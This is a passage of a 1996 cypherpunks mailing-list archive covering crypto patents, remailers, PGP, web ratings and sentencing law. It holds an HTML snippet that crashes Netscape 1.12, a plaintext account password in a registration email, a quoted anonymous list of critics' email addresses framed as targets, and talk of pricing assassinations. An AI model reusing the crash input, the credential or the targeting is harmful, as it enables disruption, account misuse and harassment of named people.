From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 9 Mar 1996 11:23:48 +0800
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: News on RSA vs. Cylink Injunctions and Patents
In-Reply-To: <9602088263.AA826308428@snail.rsa.com>
Message-ID: <199603082231.RAA11593@homeport.org>
MIME-Version: 1.0
Content-Type: text


baldwin wrote:

|         The following press release from RSA may be of interest to the
| folks on this list.
|                 --Bob
| -----------------------------------

| In denying the motion the court found that "RSA has raised serious question 
| (sic) regarding the validity of the first of the Stanford patents, the 
| Diffie-Hellman patent."

	Is RSA now saying that the original Diffie-Hellman patent
(#4,200,770) is not valid?  I'm curious, because in the past, as I
understand things, RSA has said that the DH patent covers El Gamal.
If RSA no longer considers DH to be a valid patent, that would mean El
Gamal is not patent encumbered.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Mar 1996 23:37:14 +0800
To: tcmay@got.net
Subject: Re: Remailers not heard from; info?
Message-ID: <01I23RKTOST2AKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 20-FEB-1996 09:24:11.00

>(There are wrinkles that work, such as adding a subject line based on stuff
>stored inside the encrypted block a remailer opens for furhter processing.
>The nth remailer can add a suject line that may be different for every hop,
>or only added near or at the end of the remailings...)

	Adding a new subject line for each hop has the advantage that one can't
pick out messages to examine (for use in traffic analysis) simply because they
don't have subject lines. (I realize that lots of messages go through without
subject lines; one could, however, use such a filter as the initial thing to
look at before one checks whether a message appears to be something encrypted.
Steaography won't work to conceal such because of the multiple encryption,
unless the remailer combined decryption with steaography extraction and later
"packing". One problem with the latter solution, which does have its points,
would be the need for lots of different things with which to use steaography.
Otherwise, you could track remailers by that they kept sending out almost
exactly the same file over and over again; using the same one as was sent in
would be a variety of "barium-tagging". Hmm... you could have a setup that
added the message's steaographic concealment to the end of a "stack", and
picked up the new image/sound/whatever off of the start of the "stack." Could
be a bit expensive in disk space, though.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sat, 9 Mar 1996 15:38:32 +0800
To: cypherpunks@toad.com
Subject: Re: ANTI-CRYPTO CYPHERPUNKS
In-Reply-To: <199603080239.SAA00668@jobe.shell.portal.com>
Message-ID: <zNOQx8m9LgkZ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199603080239.SAA00668@jobe.shell.portal.com>,
anonymous-remailer@shell.portal.com wrote:
> B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
> M. Blaze: mab@crypto.com, mab@research.att.com
> J. Bizdos: jim@rsa.com
> S. Safaddar: shabbir@vtw.org
> D. Weinstein: djw@vplus.com
> P.. Peterson: padgett@hobbes.orl.mmc.com
> 
> I wish to point out that some of these people are just probably misguided
> and should be educated not hurt. A full mail spool is educatio[nal but
> but it would IMHO be wrong to do mailbombing the postmaster or hacking
> their accts etc. Give them a chance.
> 
> 

Me, too!  Please add me to the list!

Alan "@aol.com" Bostick

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMUDjouVevBgtmhnpAQGX9AMAwxL8dT+mLlK4U81PMtF03JYNZMaImIMQ
Srj1UKhV490BTHoqcfQZCg8eDiej5U9pniXwX8DSOJXV/vfuqi94dGOoxmqffa7+
p7nHKeEPItqTgvzJ8xJeS4NBk/Pd8xN4
=X6go
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 10 Mar 1996 18:14:43 +0800
To: cypherpunks@toad.com
Subject: Re: LACC: TER_ror
In-Reply-To: <wEv0bcA+lEQxEwbk@crecon.demon.co.uk>
Message-ID: <199603090225.SAA19368@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In message <199603080259.VAA05749@pipe2.nyc.pipeline.com>, John Young
> <jya@pipeline.com> writes
> >   The Economist, March 2, 1996, pp. 23-25. 
> 
> With whose permission are you posting this copyrighted material?

Who cares about protecting The fucking Economist?  If I find any
relevent articles, I'll post 'em here.

> 
> tbt
> --
> | Bruce Tober - octobersdad@crecon.demon.co.uk - B'ham, Eng      |
> | pgp key ID 0x9E014CE9, "Fear of corrupting the mind of the     |
> | younger generation is the loftiest form of cowardice,"         |
> | The US Congress and President are guilty as hell of such.      |
> 


-- 
Imagine yourself as a picture machine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Mar 1996 13:12:24 +0800
To: willer@carolian.com
Subject: Re: PGP to PC mail integration
Message-ID: <01I23UGYZTP0AKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"willer@carolian.com"  1-MAR-1996 18:50:23.84

>I wrote:
>>	You'd put something into the mail message itself that would tell it
>>"don't encrypt this" and/or "don't sign this". Hmm... you'd need to put in
>>messages to be signed and/or encrypted your passphrase, or have it gotten
>>some other way... which doesn't look very safe.

>Not very user-friendly either.

	That depends on one's standards. I prefer text-based interfaces, and
they are needed for many setups.

>Usually the proxy would be on the same machine as the mail program (i.e. "your
>machine"). That would mean the "attack proxy" would have to be installed on
>the user's PC, and if someone has that kind of access to your machine, their
>secret keyring is vulnerable anyway.

	Good point. This also argues against the passphrase into the mail
being that much of a problem... with the massive exception of something going
wrong with the mail proxy program so that it lets through the email, with the
passphrase and possibly without any encryption.
	However, as has been pointed out on other aspects of this, one could
have the passphrase entered once (in a special mail message with no valid
To: address, for instance) per session.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 18:12:35 +0800
To: cypherpunks@toad.com
Subject: Re: Paint Your Own Scarlet Letter (Was: Edited Edupage, 29 Feb 1996)
Message-ID: <01I23UUCPDM2AKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: lmccarth@cs.umass.edu

>I couldn't resist the temptation. I rushed out and rated my home page
>as evil incarnate, at least according to the SafeSurf rating system. No
>innocent rugrats are gonna be learning anything about my work in crypto and
>symbolic computation on the web !

	I have noticed that they ask for one's URL on the page in question.
This information gathering brings to mind the question of if they plan on also
keeping some sort of database. While private rating efforst are not directly
wrongful, given the circumstances involved they may be attempting to mandate
some such (either directly or through lawsuits) via governmental pathways.

>It's, uh, interesting to note that "homosexual themes" gets a whole
>separate category from "heterosexual themes". :[

	Quite. (Incidentally, that the CyberAngels are associated with
SafeSurf, which has this distinction in their material also, gives the lie to
many of the CyberAngels' claims). I am currently in the process of writing a
response to this proposal, and will post the initial version to cypherpunks.


>Here's the reply I received after filling out the SafeSurf web form. It looks
>as though anyone can use the code below by sticking it in their HTML as
>directed:

	They supposedly have the code in question copyrighted. I suspect that
such an attempt will not be valid without changes to copyright laws, but I
am not a lawyer. (It does not appear to me, at least, to have any degree of
true and original creativity involved).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 9 Mar 1996 13:09:40 +0800
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC,   Canada))
Subject: Re: U.S. State Dept criticizes Chinese net-censorship
In-Reply-To: <9603082204.AB04688@cti02.citenet.net>
Message-ID: <clEAnke00YUuMq9H4t@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-Mar-96 Re: U.S. State Dept
critici.. by JFA T. QC, Canada@citene 
> There is no such thing as "self-censorship".  Either you stick to 
> your values, and then it is *not* censorship, or then you do not,
> and then, it is neither.

Self-censorship does happen, and it's a growing problem in the arts
community. (I'm not a commercial artist, so this is my understanding
from other panelists and speakers at a conference I spoke at last month.)

Making art more palatable or less "extreme" to curry favor with
corporate patrons, or to get that NEA grant, or to get that faculty
position is self-censorship, and it does happen.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 9 Mar 1996 23:37:01 +0800
To: cypherpunks@toad.com
Subject: Re: hammers, crowbars and remailers & Leahy
In-Reply-To: <9603082223.AA05907@cti02.citenet.net>
Message-ID: <YlEApma00YUu8q9IxI@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-Mar-96 hammers, crowbars and
remai.. by JFA T. QC, Canada@citene 
> Would an anonymous phone call notifying the hardware store owner that
> somebody will buy tools that will be used to commit a crime
> be significant?

I don't think so, or at least I'd argue that it's not sufficient. I
think the legal concept is _scienter_, or "guilty knowledge." Is an
anonymous phone call sufficient to establish that?

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Mar 1996 23:36:51 +0800
To: frantz@netcom.com
Subject: Re: Paint Your Own Scarlet Letter (Was: Edited Edupage, 29 Feb 1996)
Message-ID: <01I23V0GL0YMAKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com"  1-MAR-1996 21:54:54.53

>From SafeSurf Rating Page via lmccarth@cs.umass.edu wrote:
>>Thank you for making the Internet a safer place without censorship.
>>Until later, SafeSurfing to you!

	Incidentally, the strategy of simply rating one's page all 9's, if one
is required through some means of rating it at all, has the distinct advantage
of making any system using such filters more annoying to use. (One would, of
course, except any page making a political statement or other material that one
wanted to get out to as wide a number of people as possible). 

>(I think I want to start a web search engine looking for pages rated
>SS~~002 9, SS~~004 9, SS~~005 <5, and all the others don't care.)

	A configurable search engine on this basis could be very nice.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: registrar@switchboard.com (Switchboard Registrar)
Date: Sat, 9 Mar 1996 13:01:43 +0800
To: cypherpunks@toad.com
Subject: Welcome to Switchboard
Message-ID: <19960308191623236.AAA160@www2>
MIME-Version: 1.0
Content-Type: text/plain


  Thank you for registering in the Switchboard database.
Your Switchboard login is:

     Email: cypherpunks@toad.com
  Password: JimArts

This password is case sensitive.

  Once you log in (set your browser to http://www.switchboard.com),
your entry appears in the directory with your email address
attached.  You may then update your listing to show
exactly the information you want and correct errors.
Note that Switchboard waits until you log in to change the
directory, because this step verifies that your email address
is correct.

  Logging in also allows you to create an additional
listing, change your password, list your home page URL,
unlist your main listing, and access other features.

  Once you are logged in, please change your password to make it
easier to remember.

  If you did not register in Switchboard and received this message
erroneously, please Reply to Registrar@switchboard.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 10 Mar 1996 14:39:23 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603090339.TAA15249@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:59 AM 3/8/96 -0800, Timothy C. May wrote:
> California's "Three Strikes and
> You're Out" sentencing law is having this effect:
> [...]
> One guy
> featured had never committed any violent acts, and his 3rd strike was for
> lifing a pizza.

This is incorrect:  If you read the famous pizza guy's career, you are 
likely to wind up calling for "Three strikes and hang them from the lampost."

Also he did not steal the pizza.  He destroyed it in the course of 
intimidating some kids who were eating pizza.

In theory one would expect the law to have this unjust effect, 
but in practice most of the poster boys that people give as 
examples of the injustice of this law are folk that one would 
like to see taken behind a barn and shot out of hand.

Perhaps the prosecutors are exercising prosecutorial discretion?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@vplus.com (Dan Weinstein)
Date: Sat, 9 Mar 1996 05:59:04 +0800
To: cypherpunks@toad.com
Subject: Re: ANTI-CRYPTO CYPHERPUNKS
In-Reply-To: <960308040202_240667145@emout07.mail.aol.com>
Message-ID: <31408e5b.4022361@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Mar 1996 04:02:05 -0500, you wrote:

>In a message dated 96-03-08 01:37:10 EST, you write:
>
>>Subj:	ANTI-CRYPTO CYPHERPUNKS
>>Date:	96-03-08 01:37:10 EST
>>From:	anonymous-remailer@shell.portal.com
>>Sender:	owner-cypherpunks@toad.com
>>To:	cypherpunks@toad.com
>>
>>This is the first in a regular series of postings of cypherpunks
>>who have joined big brothers fight to deprive you from Unescrowed
>>Crypto. Some of these pigs have come out in favor of the new anticrypto
>>bill which makes it a crime to use crypto if big bro can't read it
>>and also sets up key escrow but others have just said that they
>>don't care if the government can read YOUR mail as long as they get
>>what they want.
>
>I see the mentally impaired, chicken crap eating buttwipe that wrote this
>drivel wasn't even brave enough to post his real email address.
>
>Jonathan Wienke

Of course not, then he might be subjected to the treatment that he so
callously suggests for those of us who are on the list.

Proud to have made the list,



Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Mar 1996 16:12:26 +0800
To: cypherpunks@toad.com
Subject: crash_netscape.html
Message-ID: <199603081900.UAA13351@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Netscape 1.12 core dumped on me while surfing today.
Narrowed it down to this.  (Don't try this at home, kids).

<html>
<table width=450 border cellpadding=2>
<tr>
<td colspan=4 align=center>
<table>
<tr>
<td width=60></td>
<td width=330>DIE</td>
<td width=60></td>
</tr>
</table>
</td>
</tr>
</table>
</html>

Crash! Core dump, sound of breaking code.
Tested on HPUX only.  Apparently doesn't crash Gold 2.0
on Win95.

a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AFDA2@aol.com
Date: Sun, 10 Mar 1996 18:12:02 +0800
To: lindat@iquest.net
Subject: CRIMINAL LAW SEMINAR
Message-ID: <960308200934_441681488@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Friday, April 19, 1996, the Association Of Federal Defense Attorneys
(AFDA) will present a one-day seminar, "The Key Fundamentals of Federal
Sentencing."

The seminar will be held at the Los Angeles Airport Marriott Hotel, from 9:00
am to 4:30 pm.  Fee:  $125 for AFDA members;  $175 for non-members.  Handout
materials will include case law outlines and the sentencing guidelines.

This seminar is specially designed for state court attorneys who handle
occasional federal cases, for new federal defense attorneys, and for those
who want a primer on the mechanics of the federal guidelines.  For the
experienced federal practitioner, AFDA will present its Third Annual Seminar,
"Federal Sentencing Updates & Strategies," in the fall of 1996.

For more information, click the Reply button and send a brief email
requesting a fax-flyer.  Remember to include your fax number.

The Association's email address is: AFDA2@AOL.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 9 Mar 1996 14:34:57 +0800
To: cypherpunks@toad.com
Subject: Re: rhetorical trickery
Message-ID: <199603090231.VAA01548@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Vladimir Z. Nuri wrote:
[..]
> there is an infamous case of a child pornographer or pedophile in
> California that is sometimes cited by law enforcement representatives
> as a good example of the evils of encryption: supposedly he encrypted
> his diary and it couldn't be unlocked by them. this was mentioned in
> the article.
> 
> but I have a question: how did they know it was his diary?

If I remember some earlier discussion about that case from a few years
ago, the file was called "diary.pgp".

What they don't mention is that they were still able to convict him.
They were just under the belief that they could figure out who all the
victims were they didn't know about from his alleged diary... so they
could "help" the other victims or maybe get him ore jail time?

Odd thing is he used PGP 1.0, which used Bass-O-Matic.

> I've noticed that people tend to often make conceptual leaps like
> this that are wholly unjustified. it is easy to get their opposition

Yes. This is quite common in political/social discussions and
argumentation.  A big problem is that people are no longer taught
rhetoric and argumentation in schools.  Another problem is that it
is a clear example the opponents of strong crypto can point to, with
lots of emotional strings attached.  The best you can do is to note
that the case in question was still sucessfully prosecuted, and also
to give counter-examples as to why PGP has helped people (cite the
usual freedom fighters in Burma, Amnesty International examples, or
cite the theft of records from the UN's investigation in Bosnia, noting
that it wasn't encrypted....)



- --Rob
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUDtbSoZzwIn1bdtAQGyLwGAu0nRv276K9cAmJslrl6HwW6m0YHWYKw/
mpZvHynKhfdNLRj6ghaHHH8V2DMDYrLO
=SpjH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 9 Mar 1996 14:33:15 +0800
To: cypherpunks@toad.com
Subject: Re: hammers, crowbars and remailers & Leahy
Message-ID: <199603090236.VAA01595@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:

> What is the difference between an small hardware store owner
> selling a hammer and a crowbar to a guy that will commit burglary and
> a remailer owner providing services to , say, the same burglar
> who wants to sell his stolen goods.[..]

Be wary.  There are people who believe gun or ammo manufacturers (and
even knife manufacturers) should be held responsible for criminal use
of their products.  Bartenders or party hosts are already responsible
when one of their patrons or guests gets too drunk (though the connection
with knowing that the person is wasted is a bit clearer there.)

The people who support such liabilities think there is a clear connection
and it isn't very good.

You may as well argue about religion or how many angels can fit on the
head of a pin with such people.  They go by emotional arguments, in many
cases because they've a personal connection as or with a victim of some
crime.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUDuyCoZzwIn1bdtAQEqoQGAuU6nvataj6gt4VNUVjgyuYaTe8QxQ4Ww
tPxTQiEvS/4C3C3vVUQ4QNWQbt5DxXzu
=JRj/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 10 Mar 1996 18:11:56 +0800
To: cypherpunks@toad.com
Subject: Re: FCC Sets Comment Date for Internet Phone Call Rulemaking (fwd)
Message-ID: <199603090239.VAA01613@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Henry Huang wrote:
> ------- Start of forwarded message -------
> From: "Neal J. Friedman" <njf@commlaw.com>[..]
> 
> The FCC has acted with astonishing speed in setting a date for comments 
> the ACTA petition to regulate telephone calls via the Internet.  It is 
> uncommon for rule making petitions to sit for weeks, months, even years
> without action.  ACTA filed its petition on March 6th and two days [..]

Odd that I have yet to see this in any business news.  Has it made the
WSJ, NYT, Bloomberg or TWP?

Also odd that the FCC could try to regulate it. Not much they can do
if someone outside the US uses IPhone or the like.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUDveCoZzwIn1bdtAQHRkQF/U9Ypd5hAkoY86fF8e4pW9HLtVVvrRTVz
GqxrRoq12MRtfQZqtD5q0u7VY6gJgR3Y
=T64o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 9 Mar 1996 16:21:01 +0800
To: cypherpunks@toad.com
Subject: Re: News on RSA vs. Cylink Injunctions and Patents
Message-ID: <199603090543.VAA06458@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 AM 3/8/96 PST, "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> wrote:
>        The following press release from RSA may be of interest to the
>folks on this list.

Thanks!  It is of interest, but from one or two rounds of previous experience,
I'd not want to draw any conclusions from either RSA's or Cylink's press
releases
about the content or meaning of a given court decision.  They seem to inhabit
different and not-quite parallel universes.

>Cylink contends that RSA's software infringes its Stanford patents and that 
>licensing required an additional grant from Cylink, despite 
>the fact that RSA already has a license.  After hearing oral arguments on 
>Feb. 29, Judge Williams denied Cylink's motion from the bench and later 
>issued a written order explaining that "several factors weigh against 
>finding that (Cylink) has shown a likelihood of success on 
>the merits."  

This sounds a lot like Cylink asked for a temporary restraining order
blocking sales of BSAFE until the resolution of a lawsuit, and the judge
rejected that request.  If the quotations mean the same in context
as they do in a press release (:-), they're moderately negative,
though not a total rejection of the main case.  It is pleasant to have
RSA on the side of breaking the D-H patent and limiting the scope of H-M.
Maybe this will help free the algorithms even before Roger Schlafly's suit does.

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 9 Mar 1996 14:47:44 +0800
To: cypherpunks@toad.com
Subject: FCC v. Internet Phone?
Message-ID: <199603090248.VAA01654@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've done a scan of the NYT web site (www.nytimes.com) and the AP
and Reuters... no mention of this at all, though there's a new blurb
about another company promopting an Internet Phone type technology.

- --Rob
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUDxiSoZzwIn1bdtAQFduAGArzYvmvL26xUQiag6etkyg/ysh8RUhTqX
s19MCcxWng+3T3frKu5P8eRju2XYBoF5
=Du5Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 14:28:37 +0800
To: jamesd@echeque.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603090558.VAA18420@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:33 PM 3/8/96 -0800, jamesd wrote:
>Also he did not steal the pizza.  He destroyed it in the course of 
>intimidating some kids who were eating pizza.
>
>In theory one would expect the law to have this unjust effect, 
>but in practice most of the poster boys that people give as 
>examples of the injustice of this law are folk that one would 
>like to see taken behind a barn and shot out of hand.

The pizza guy was a thug, but twice as many third-strikers got
their third strike for marijuana as for all violent crimes combined.
I assume most of these had large quantities, possibly intended for sale,
and a number of them had real crimes as their previous felonies
rather than Prohibition-related offenses.  But you can get legally
serious quantities of marijuana by just growing a couple of plants.

>Perhaps the prosecutors are exercising prosecutorial discretion?

Not much - Government Radio said tonight that they're not allowed to
plea-bargain third strike felonies down to misdemeanors.  The LA public
defender's office is absolutely swamped, partly because third-strike
cases are supposed to get diligent support, and partly because they
have to go to trial rather than plea-bargaining a guilty, which is less work.
The county jails are also having serious crowding problems, because
prospective third-strikers are being kept in them pending trial
to avoid risk of flight, so non-third-strike jailees are getting out
early (especially drug violators.)

And the guys who just got busted for having fertilizer, diesel oil,
and drugs on their farm had a whole three ounces of marijuana and
personal-use quantities of crank.  Maybe they were planning to blow up
buildings rather than stumps; but the Feds are trying to paint them
as max evil just to build up their case.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@vplus.com (Dan Weinstein)
Date: Sat, 9 Mar 1996 10:14:29 +0800
To: cypherpunks@toad.com
Subject: Re: Not a good idea...
In-Reply-To: <199603081914.NAA02963@proust.suba.com>
Message-ID: <3140ad62.11966620@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Mar 1996 13:14:25 -0600 (CST), Alex Strasheim
<cp@proust.suba.com> wrote:

>Who's liable?  Me, Verisign, or Netscape?  All of us?  
>
>I suspect that if I pass credit card numbers to thieves I'll get in
>trouble, but I don't have any assets.
>
>Verisign didn't make any representations directly to the public, and they 
>probably followed the procedure they negotiated with Netscape when they 
>issued me my cert.

"For secure servers, VeriSign currently offers a 'high-assurance'
Class 3 Digital ID for electronic commerce servers. "  This is from
Verisign's home page.  They are saying that this class of certificate
is safe to do commerce with.  

>Netscape put together a complicated high-tech system and told the public
>(which doesn't understand cryptography) that their system was suitible for
>commerce -- it's even in the product's name!  They didn't build in prudent
>safeguards to prevent me from running my forms processing service, which
>is such a trivial thing to set up that it should have been forseen.  (Q:
>I've never gotten a real cert -- do I have to agree to something that
>would prohibit my forms processing business?)

I would think that netscape would only make agreements with CAs that
accepted liability.  I would also think that Netscape would only be
liable if they were found to have put in a CA that they had reason to
believe was not taking due diligence to ensure that the key really
belonged to the company that claimed to own it.

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 9 Mar 1996 17:00:43 +0800
To: cypherpunks@toad.com
Subject: Net Day 96 and AOL
Message-ID: <199603090613.WAA04960@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Heard on the radio today that AOL will be donating service for a year 
to the first 2000 schools that ask for it, as part of their contribution
to Net Day.  (For those of you not from California, an industry-led group
has been coordinating volunteers and materials to wire up schools to the net;
tomorrow's effort will be installing inside wiring so that schools that
have computers will be able to get hooked up.)  

Does anybody know if there's an AOL-friendly version of PGP that we can 
donate to the schools, to help teach kids about proper encryption?  
If nothing else, some of the cut&paste interfaces will do, I suppose.
AOL is fairly friendly about pseudonyms, and remailer support is
a no-brainer except for documentation readily understandable to kids.

                                Bill

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 9 Mar 1996 16:57:36 +0800
To: Bill Stewart <jamesd@echeque.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603090640.WAA20305@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:59 PM 3/8/96 -0800, Bill Stewart wrote:
>The pizza guy was a thug, but twice as many third-strikers got
>their third strike for marijuana as for all violent crimes combined.
>I assume most of these had large quantities, possibly intended for sale,
>and a number of them had real crimes as their previous felonies
>rather than Prohibition-related offenses.  But you can get legally
>serious quantities of marijuana by just growing a couple of plants.

I wonder how many of these drug dealers previous "real crimes" were related
to using violence to protect their drug business, defense which would have
used the courts and police had drug dealing been legal.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 11 Mar 1996 05:21:23 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics(tm) was V-chips, CC, and Motorcycle Helmets
Message-ID: <199603090640.WAA20310@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:26 PM 3/8/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"jimbell@pacifier.com"  "jim bell" 16-FEB-1996 03:25:12.58
>>At 02:18 PM 2/15/96 -0800, Bill Frantz wrote:

Since my name keeps getting dragged into this discussion, I will share with
youall the conclusions I reached after my last set of exchanges with Jim
Bell.

(1) Assassination Politics (AP) will be most useful to a fired-up group of
people who want to silence a single person.  Madeline Murray O'Hare comes
to mind.  (She was a Texas atheist who challenged school prayer and won.)

(2) Jim Bell and I disagree strongly on the market price for assassinations.

(3) Jim Bell and I disagree on the number of deaths needed to deter someone
